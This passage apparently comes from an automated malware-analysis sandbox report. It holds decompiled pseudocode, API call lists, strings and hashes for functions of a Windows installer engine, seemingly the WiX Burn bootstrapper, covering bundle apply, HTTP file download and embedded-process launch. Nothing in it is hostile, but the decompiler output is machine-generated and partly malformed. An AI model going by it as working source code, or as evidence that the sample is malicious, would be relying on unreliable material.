                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00410E90
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004010F8,00000000,8BE275C0,?,00401414,00000000,?,?,?,?,00401EA4), ref: 00410E9F
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,004010F8,00000000,8BE275C0,?,00401414,00000000,?), ref: 00410EFC
                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,00000088,00000000,00000000,000000B8,00000001,00000000), ref: 00410FEE
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410FF7
                                                                                                                                                                  • CloseHandle.KERNEL32(00401414,00000088,00000000,00000000,000000B8,00000001,00000000), ref: 00411011
                                                                                                                                                                    • Part of subcall function 004223E3: SetThreadExecutionState.KERNEL32 ref: 004223E8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to elevate., xrefs: 00410DF0
                                                                                                                                                                  • UX aborted apply begin., xrefs: 00410CF0
                                                                                                                                                                  • Failed to register bundle., xrefs: 00410E4A
                                                                                                                                                                  • Failed while caching, aborting execution., xrefs: 00410EE9
                                                                                                                                                                  • Engine cannot start apply because it is busy with another action., xrefs: 00410CA6
                                                                                                                                                                  • Failed to set initial apply variables., xrefs: 00410D5E
                                                                                                                                                                  • Failed to cache engine to working directory., xrefs: 00410DCD
                                                                                                                                                                  • Failed to create cache thread., xrefs: 00410ECD
                                                                                                                                                                  • Another per-user setup is already executing., xrefs: 00410D34
                                                                                                                                                                  • core.cpp, xrefs: 00410CE6, 00410EC3
                                                                                                                                                                  • Another per-machine setup is already executing., xrefs: 00410E24
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                                  • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp
                                                                                                                                                                  • API String ID: 2169948125-1544865161
                                                                                                                                                                  • Opcode ID: fce08840dbeed8db669ce1ad6f7c6f533a5b5391f67e737f00733be569f88cb4
                                                                                                                                                                  • Instruction ID: 8f4a0e46f18f1a404a5f416782b1ecca4c4e4891cd68b45663a0887cf3f8106d
                                                                                                                                                                  • Opcode Fuzzy Hash: fce08840dbeed8db669ce1ad6f7c6f533a5b5391f67e737f00733be569f88cb4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0DC1B671900215EBDF219F90D886BEF76A8AF04705F14017BFD04AA281DBF899C5CBAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E0042515A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, WCHAR* _a32, signed short _a36, signed short _a40, signed short _a44, signed short _a48, char _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed short _v12;
                                                                                                                                                                  				signed short _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                  				void* _v32;
                                                                                                                                                                  				signed short _v36;
                                                                                                                                                                  				signed short _v40;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				signed short _t68;
                                                                                                                                                                  				signed short _t69;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				signed short _t90;
                                                                                                                                                                  				signed short _t93;
                                                                                                                                                                  				void* _t101;
                                                                                                                                                                  				signed short _t103;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				signed short _t111;
                                                                                                                                                                  				signed short _t112;
                                                                                                                                                                  				signed short _t115;
                                                                                                                                                                  
                                                                                                                                                                  				_t110 = 0;
                                                                                                                                                                  				_t101 = 0;
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				_t112 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v16 = 1;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				asm("movlpd [ebp-0x24], xmm0");
                                                                                                                                                                  				_t67 = CreateFileW(_a32, 0xc0000000, 4, 0, 4, 0x80, 0);
                                                                                                                                                                  				_v32 = _t67;
                                                                                                                                                                  				if(_t67 != 0xffffffff) {
                                                                                                                                                                  					_t68 = VirtualAlloc(0, 0x10000, 0x3000, 4);
                                                                                                                                                                  					_v28 = _t68;
                                                                                                                                                                  					__eflags = _t68;
                                                                                                                                                                  					if(_t68 != 0) {
                                                                                                                                                                  						_t69 = _a48;
                                                                                                                                                                  						_t103 = _a44;
                                                                                                                                                                  						_v12 = _t69;
                                                                                                                                                                  						_a48 = _t103;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							__eflags = _t103;
                                                                                                                                                                  							if(_t103 != 0) {
                                                                                                                                                                  								goto L8;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t69;
                                                                                                                                                                  							if(_t69 != 0) {
                                                                                                                                                                  								goto L8;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t103 = _a36;
                                                                                                                                                                  							_t69 = _a40;
                                                                                                                                                                  							L11:
                                                                                                                                                                  							_t112 = E00424FED(_a52, _a56, _t103, _t69,  &_v24);
                                                                                                                                                                  							__eflags = _t112;
                                                                                                                                                                  							if(_t112 < 0) {
                                                                                                                                                                  								_push("Failed to allocate range request header.");
                                                                                                                                                                  								_push(_t112);
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  								L31:
                                                                                                                                                                  								__eflags = _t101;
                                                                                                                                                                  								if(_t101 != 0) {
                                                                                                                                                                  									InternetCloseHandle(_t101);
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t110;
                                                                                                                                                                  								if(_t110 != 0) {
                                                                                                                                                                  									InternetCloseHandle(_t110);
                                                                                                                                                                  								}
                                                                                                                                                                  								L35:
                                                                                                                                                                  								if(_v24 != 0) {
                                                                                                                                                                  									E004380AB(_v24);
                                                                                                                                                                  								}
                                                                                                                                                                  								_t70 = _v28;
                                                                                                                                                                  								if(_t70 != 0) {
                                                                                                                                                                  									VirtualFree(_t70, 0, 0x8000);
                                                                                                                                                                  								}
                                                                                                                                                                  								_t71 = _v32;
                                                                                                                                                                  								if(_t71 != 0xffffffff) {
                                                                                                                                                                  									CloseHandle(_t71);
                                                                                                                                                                  								}
                                                                                                                                                                  								return _t112;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t110;
                                                                                                                                                                  							if(_t110 != 0) {
                                                                                                                                                                  								InternetCloseHandle(_t110);
                                                                                                                                                                  								_t21 =  &_v8;
                                                                                                                                                                  								 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                  								__eflags =  *_t21;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t101;
                                                                                                                                                                  							if(_t101 != 0) {
                                                                                                                                                                  								InternetCloseHandle(_t101);
                                                                                                                                                                  								_t23 =  &_v20;
                                                                                                                                                                  								 *_t23 = _v20 & 0x00000000;
                                                                                                                                                                  								__eflags =  *_t23;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t102 = _a20;
                                                                                                                                                                  							_t112 = E004255EF(_a4, _a8, _a12, _a16, _a20, L"GET", _v24, _a24, _a28,  &_v8,  &_v20,  &_v16);
                                                                                                                                                                  							__eflags = _t112;
                                                                                                                                                                  							if(_t112 < 0) {
                                                                                                                                                                  								E00430A57(_t112, "Failed to request URL for download: %ls",  *_t102);
                                                                                                                                                                  								_t110 = _v8;
                                                                                                                                                                  								_t101 = _v20;
                                                                                                                                                                  								goto L31;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t106 = _a48;
                                                                                                                                                                  								_t101 = _v20;
                                                                                                                                                                  								_t85 = _v12;
                                                                                                                                                                  								__eflags = _t106;
                                                                                                                                                                  								if(_t106 != 0) {
                                                                                                                                                                  									L21:
                                                                                                                                                                  									_t111 = _v16;
                                                                                                                                                                  									L22:
                                                                                                                                                                  									__eflags = _t111;
                                                                                                                                                                  									if(_t111 == 0) {
                                                                                                                                                                  										asm("xorps xmm0, xmm0");
                                                                                                                                                                  										asm("movlpd [ebp+0x38], xmm0");
                                                                                                                                                                  									}
                                                                                                                                                                  									_t112 = E00425ADA(_t101, _v32,  &_a52, _a60, _t106, _t85, _v28, 0x10000, _a64);
                                                                                                                                                                  									__eflags = _t112;
                                                                                                                                                                  									if(_t112 < 0) {
                                                                                                                                                                  										E00430A57(_t112, "Failed while reading from internet and writing to: %ls", _a32);
                                                                                                                                                                  										_t110 = _v8;
                                                                                                                                                                  										goto L31;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										__eflags = _t111;
                                                                                                                                                                  										_t110 = _v8;
                                                                                                                                                                  										if(_t111 == 0) {
                                                                                                                                                                  											goto L31;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t69 = _v12;
                                                                                                                                                                  										_t103 = _a48;
                                                                                                                                                                  										continue;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t85;
                                                                                                                                                                  								if(_t85 != 0) {
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t90 = E00438698(_t106, _t101,  &_v40);
                                                                                                                                                                  								__eflags = _t90;
                                                                                                                                                                  								if(_t90 < 0) {
                                                                                                                                                                  									_t106 = _a36;
                                                                                                                                                                  									_t85 = _a40;
                                                                                                                                                                  									_t111 = 0;
                                                                                                                                                                  									_a48 = _a36;
                                                                                                                                                                  									_v12 = _a40;
                                                                                                                                                                  									_v16 = 0;
                                                                                                                                                                  									goto L22;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t106 = _v40;
                                                                                                                                                                  								_t85 = _v36;
                                                                                                                                                                  								_a48 = _v40;
                                                                                                                                                                  								_v12 = _v36;
                                                                                                                                                                  								goto L21;
                                                                                                                                                                  							}
                                                                                                                                                                  							L8:
                                                                                                                                                                  							__eflags = _a56 - _t69;
                                                                                                                                                                  							if(__eflags > 0) {
                                                                                                                                                                  								goto L31;
                                                                                                                                                                  							}
                                                                                                                                                                  							if(__eflags < 0) {
                                                                                                                                                                  								goto L11;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _a52 - _t103;
                                                                                                                                                                  							if(_a52 >= _t103) {
                                                                                                                                                                  								goto L31;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L11;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t93 = GetLastError();
                                                                                                                                                                  					__eflags = _t93;
                                                                                                                                                                  					_t115 =  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					__eflags = _t115;
                                                                                                                                                                  					_t112 =  >=  ? 0x80004005 : _t115;
                                                                                                                                                                  					E004300D9(0x80004005, "downloadengine.cpp", 0x13c, _t112);
                                                                                                                                                                  					_push("Failed to allocate buffer to download files into.");
                                                                                                                                                                  					_push(_t112);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					goto L35;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t118 =  <=  ? GetLastError() : _t97 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  				_t112 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t97 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  				E004300D9(0x80004005, "downloadengine.cpp", 0x137, _t112);
                                                                                                                                                                  				E00430A57(_t112, "Failed to create download destination file: %ls", _a32);
                                                                                                                                                                  				goto L35;
                                                                                                                                                                  			}

























                                                                                                                                                                  0x004252e2
                                                                                                                                                                  0x00425388
                                                                                                                                                                  0x0042538d
                                                                                                                                                                  0x00425390
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004252e8
                                                                                                                                                                  0x004252e8
                                                                                                                                                                  0x004252eb
                                                                                                                                                                  0x004252ee
                                                                                                                                                                  0x004252f1
                                                                                                                                                                  0x004252f3
                                                                                                                                                                  0x00425313
                                                                                                                                                                  0x00425313
                                                                                                                                                                  0x00425316
                                                                                                                                                                  0x00425316
                                                                                                                                                                  0x00425318
                                                                                                                                                                  0x0042531a
                                                                                                                                                                  0x0042531d
                                                                                                                                                                  0x0042531d
                                                                                                                                                                  0x0042533f
                                                                                                                                                                  0x00425341
                                                                                                                                                                  0x00425343
                                                                                                                                                                  0x00425373
                                                                                                                                                                  0x00425378
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425345
                                                                                                                                                                  0x00425345
                                                                                                                                                                  0x00425347
                                                                                                                                                                  0x0042534a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042534c
                                                                                                                                                                  0x0042534f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042534f
                                                                                                                                                                  0x00425343
                                                                                                                                                                  0x004252f5
                                                                                                                                                                  0x004252f7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004252fe
                                                                                                                                                                  0x00425303
                                                                                                                                                                  0x00425305
                                                                                                                                                                  0x00425357
                                                                                                                                                                  0x0042535a
                                                                                                                                                                  0x0042535d
                                                                                                                                                                  0x0042535f
                                                                                                                                                                  0x00425362
                                                                                                                                                                  0x00425365
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425365
                                                                                                                                                                  0x00425307
                                                                                                                                                                  0x0042530a
                                                                                                                                                                  0x0042530d
                                                                                                                                                                  0x00425310
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425310
                                                                                                                                                                  0x00425262
                                                                                                                                                                  0x00425262
                                                                                                                                                                  0x00425265
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042526b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042526d
                                                                                                                                                                  0x00425270
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425270
                                                                                                                                                                  0x00425252
                                                                                                                                                                  0x00425206
                                                                                                                                                                  0x00425215
                                                                                                                                                                  0x00425217
                                                                                                                                                                  0x0042521f
                                                                                                                                                                  0x00425221
                                                                                                                                                                  0x0042522f
                                                                                                                                                                  0x00425234
                                                                                                                                                                  0x00425239
                                                                                                                                                                  0x0042523a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425240
                                                                                                                                                                  0x004251b8
                                                                                                                                                                  0x004251c2
                                                                                                                                                                  0x004251d0
                                                                                                                                                                  0x004251de
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,75C08550,?,000000FF,?,?,?,00000078), ref: 00425199
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004251A7
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 004251F9
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00425206
                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004253D8
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004253E7
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate buffer to download files into., xrefs: 00425234
                                                                                                                                                                  • Failed to allocate range request header., xrefs: 00425398
                                                                                                                                                                  • Failed to request URL for download: %ls, xrefs: 00425382
                                                                                                                                                                  • Failed to create download destination file: %ls, xrefs: 004251D8
                                                                                                                                                                  • Failed while reading from internet and writing to: %ls, xrefs: 0042536D
                                                                                                                                                                  • GET, xrefs: 004252C7
                                                                                                                                                                  • downloadengine.cpp, xrefs: 004251CB, 0042522A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                  • String ID: Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$downloadengine.cpp
                                                                                                                                                                  • API String ID: 2028584396-2629732388
                                                                                                                                                                  • Opcode ID: 9bec20693969e32678d76742f50d6da2b1bbe1926a9e00ad939a083eef6a7e7d
                                                                                                                                                                  • Instruction ID: a77fca3a0050e094e7fd5a0dc6c4e55ac37b9c980704523f26a7d8da070f9359
                                                                                                                                                                  • Opcode Fuzzy Hash: 9bec20693969e32678d76742f50d6da2b1bbe1926a9e00ad939a083eef6a7e7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5381A031A00629ABDF11DFA5DD45BAE77B4EF48354F51211AFE01B6280D778DD408BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00424468(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                                                                                  				struct _PROCESS_INFORMATION _v28;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v32;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                  				void* _v48;
                                                                                                                                                                  				long _v52;
                                                                                                                                                                  				char _v56;
                                                                                                                                                                  				void _v60;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v64;
                                                                                                                                                                  				char _v68;
                                                                                                                                                                  				struct _STARTUPINFOW _v136;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				long _t53;
                                                                                                                                                                  				signed short _t73;
                                                                                                                                                                  				signed short _t91;
                                                                                                                                                                  				long _t95;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				signed int _t98;
                                                                                                                                                                  				void* _t104;
                                                                                                                                                                  				void* _t105;
                                                                                                                                                                  				signed short _t112;
                                                                                                                                                                  				signed short _t113;
                                                                                                                                                                  				signed short _t116;
                                                                                                                                                                  				void* _t122;
                                                                                                                                                                  
                                                                                                                                                                  				_t122 = __eflags;
                                                                                                                                                                  				_t104 = __edx;
                                                                                                                                                                  				_t97 = __ecx;
                                                                                                                                                                  				_t53 = GetCurrentProcessId();
                                                                                                                                                                  				_push(0x44);
                                                                                                                                                                  				_t95 = _t53;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v136);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				E004267C0(_t95, _t97, _t105, 0, _t122);
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t98 = 6;
                                                                                                                                                                  				memset( &_v60, 0, _t98 << 2);
                                                                                                                                                                  				_v68 = 0;
                                                                                                                                                                  				_v64 = 0;
                                                                                                                                                                  				E0040F14D( &_v60);
                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                  				_v36 = _a12;
                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                  				_v32 = _a16;
                                                                                                                                                                  				if(E0040F1D5(_t95, _t104,  &_v60,  &_v56) >= 0) {
                                                                                                                                                                  					_t112 = E0040F31A( &_v60, 0,  &_v8);
                                                                                                                                                                  					__eflags = _t112;
                                                                                                                                                                  					if(_t112 >= 0) {
                                                                                                                                                                  						_push(_t95);
                                                                                                                                                                  						_push(_v56);
                                                                                                                                                                  						_push(_v60);
                                                                                                                                                                  						_push(L"burn.embedded");
                                                                                                                                                                  						_t112 = E00433CEA( &_v12, L"%ls -%ls %ls %ls %u", _a8);
                                                                                                                                                                  						__eflags = _t112;
                                                                                                                                                                  						if(_t112 >= 0) {
                                                                                                                                                                  							_t96 = 0;
                                                                                                                                                                  							_t73 = CreateProcessW(_a4, _v12, 0, 0, 0, 0x8000000, 0, 0,  &_v136,  &_v28);
                                                                                                                                                                  							__eflags = _t73;
                                                                                                                                                                  							if(_t73 != 0) {
                                                                                                                                                                  								_v52 = GetProcessId(_v28.hProcess);
                                                                                                                                                                  								_v48 = _v28.hProcess;
                                                                                                                                                                  								_v28.hProcess = 0;
                                                                                                                                                                  								_t113 = E0040F9DC( &_v60);
                                                                                                                                                                  								__eflags = _t113;
                                                                                                                                                                  								if(_t113 >= 0) {
                                                                                                                                                                  									_t113 = E0040F6A6(0, _v44, E004243CC,  &_v36,  &_v68);
                                                                                                                                                                  									__eflags = _t113;
                                                                                                                                                                  									if(_t113 >= 0) {
                                                                                                                                                                  										_t113 = E00431FB6(0, _v48, 0xffffffff, _a20);
                                                                                                                                                                  										__eflags = _t113;
                                                                                                                                                                  										if(_t113 < 0) {
                                                                                                                                                                  											_push(_a4);
                                                                                                                                                                  											_push("Failed to wait for embedded executable: %ls");
                                                                                                                                                                  											goto L16;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push("Failed to process messages from embedded message.");
                                                                                                                                                                  										goto L13;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to wait for embedded process to connect to pipe.");
                                                                                                                                                                  									L13:
                                                                                                                                                                  									_push(_t113);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t91 = GetLastError();
                                                                                                                                                                  								__eflags = _t91;
                                                                                                                                                                  								_t116 =  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								__eflags = _t116;
                                                                                                                                                                  								_t113 =  >=  ? 0x80004005 : _t116;
                                                                                                                                                                  								E004300D9(0x80004005, "embedded.cpp", 0x59, _t113);
                                                                                                                                                                  								_push(_a4);
                                                                                                                                                                  								_push("Failed to create embedded process atpath: %ls");
                                                                                                                                                                  								L16:
                                                                                                                                                                  								_push(_t113);
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to allocate embedded command.");
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to create embedded pipe.");
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to create embedded pipe name and client token.");
                                                                                                                                                                  					L6:
                                                                                                                                                                  					_push(_t112);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					_t96 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v28.hThread != 0) {
                                                                                                                                                                  					CloseHandle(_v28.hThread);
                                                                                                                                                                  					_v28.hThread = _t96;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v28.hProcess != 0) {
                                                                                                                                                                  					CloseHandle(_v28.hProcess);
                                                                                                                                                                  					_v28 = _t96;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					CloseHandle(_v8);
                                                                                                                                                                  					_v8 = _t96;
                                                                                                                                                                  				}
                                                                                                                                                                  				E0040F16A( &_v60);
                                                                                                                                                                  				return _t113;
                                                                                                                                                                  			}

                                                                                                                                                                  0x004244f9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004244f9
                                                                                                                                                                  0x004244dd
                                                                                                                                                                  0x004244dd
                                                                                                                                                                  0x0042452b
                                                                                                                                                                  0x0042452b
                                                                                                                                                                  0x0042452c
                                                                                                                                                                  0x00424533
                                                                                                                                                                  0x00424533
                                                                                                                                                                  0x00424619
                                                                                                                                                                  0x0042461e
                                                                                                                                                                  0x00424620
                                                                                                                                                                  0x00424620
                                                                                                                                                                  0x00424627
                                                                                                                                                                  0x0042462c
                                                                                                                                                                  0x0042462e
                                                                                                                                                                  0x0042462e
                                                                                                                                                                  0x00424635
                                                                                                                                                                  0x0042463a
                                                                                                                                                                  0x0042463a
                                                                                                                                                                  0x00424643
                                                                                                                                                                  0x00424648
                                                                                                                                                                  0x0042464a
                                                                                                                                                                  0x0042464a
                                                                                                                                                                  0x00424651
                                                                                                                                                                  0x0042465c

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(751461D0,00000001,00000000), ref: 00424474
                                                                                                                                                                    • Part of subcall function 0040F1D5: UuidCreate.RPCRT4(?), ref: 0040F208
                                                                                                                                                                    • Part of subcall function 0040F1D5: StringFromGUID2.OLE32(?,0041652F,00000027), ref: 0040F225
                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 00424557
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 00424561
                                                                                                                                                                  • GetProcessId.KERNEL32(004198DC,?,?,00000000,?,?,?,?), ref: 00424599
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,004198DC,?,004243CC,?,?,?,?,?,00000000,?,?,?,?), ref: 0042461E
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,004198DC,?,004243CC,?,?,?,?,?,00000000,?,?,?,?), ref: 0042462C
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,004198DC,?,004243CC,?,?,?,?,?,00000000,?,?,?,?), ref: 00424648
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create embedded pipe name and client token., xrefs: 004244DD
                                                                                                                                                                  • Failed to create embedded process atpath: %ls, xrefs: 0042458F
                                                                                                                                                                  • Failed to create embedded pipe., xrefs: 004244F9
                                                                                                                                                                  • Failed to wait for embedded process to connect to pipe., xrefs: 004245BA
                                                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 00424512
                                                                                                                                                                  • Failed to wait for embedded executable: %ls, xrefs: 00424601
                                                                                                                                                                  • Failed to allocate embedded command., xrefs: 00424526
                                                                                                                                                                  • Failed to process messages from embedded message., xrefs: 004245DC
                                                                                                                                                                  • burn.embedded, xrefs: 0042450A
                                                                                                                                                                  • embedded.cpp, xrefs: 00424582
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleProcess$Create$CurrentErrorFromLastStringUuid
                                                                                                                                                                  • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process atpath: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                                  • API String ID: 1512633446-740426173
                                                                                                                                                                  • Opcode ID: fbd4795c8cad67875efc4afb993767a5f9e8bad3f0531e06cec0b6a54e32c457
                                                                                                                                                                  • Instruction ID: 769935e6c64afea5e7f2a1e5b32793c05a236408841bfab0bfe56f25796ca669
